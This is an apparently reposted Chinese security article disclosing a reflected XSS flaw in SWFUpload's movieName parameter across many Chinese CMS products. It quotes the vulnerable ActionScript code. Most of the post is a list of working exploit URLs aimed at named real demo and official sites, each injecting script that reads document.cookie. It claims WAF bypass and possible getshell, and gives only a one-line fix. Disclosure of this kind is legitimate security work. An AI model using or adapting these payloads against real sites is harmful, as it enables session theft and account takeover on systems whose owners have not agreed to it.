来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 实际上是很老一个问题,但经过我的测试,发现国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、...
实际上是很老一个问题,但经过我的测试,发现国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等等都存着此安全漏洞(以上基本都有demo站或官网验证),不限于服务端语言(php、asp、aspx、jsp等)、不限操作系统及服务器中间件、不限浏览器种类及filter、能绕过大部分WAF,轻则越权操作,重则直接getshell,危害不可估量。其实你们已经发现了,漏洞类型是“XSS跨站脚本攻击”。 0x01 概述 this.movieName = root.loaderInfo.parameters.movieName; this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady"); this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart"); this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued"); this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError"); this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete"); this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart"); this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress"); this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError"); this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess"); this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete"); this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug"); this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface"); this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");
cmseasy demo站: http://demo.cmseasy.cn/common/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// espcms demo站: http://demo.ecisp.cn/adminsoft/js/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// phpcms v9 demo站: http://v9.demo.phpcms.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// dedecms 织梦内容管理系统官网: http://www.dedecms.com/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// phpyun人才系统demo站: http://www.hr135.com/js/upload/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// thinksns demo站: http://demo.thinksns.com/t3/addons/theme/stv1/_static/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 74cms某网络实例: http://www.56jobw.com/admin/kindeditor/plugins/multiimage/images/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// phpdisk demo站之一: http://demo.phpdisk.com/f/includes/js/upload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 国微php168 demo站: http://sharp.php168.net/gov15/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// phpok demo站: http://www.phpok.com/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// kesioncms demo站: http://e.kesion.com/Plus/swfupload/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// pageadmin demo站: http://demo.pageadmin.net/e/incs/fckeditor/editor/plugins/swfupload/js/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// xheditor demo我没找到路径,但下载的程序包中也存在swfupload.swf文件,经测试也可以触发xss。xheditor是网上应用很多的轻编辑器,所以会引起蝴蝶效应,导致更多cms出现问题: http://xheditor/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 时代cms demo站: http://demo.sdcms.cn/lib/swf/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// emlog 官方易梦主机: http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName="]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
0x03 证明:
修复方案:更新swf,进行过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com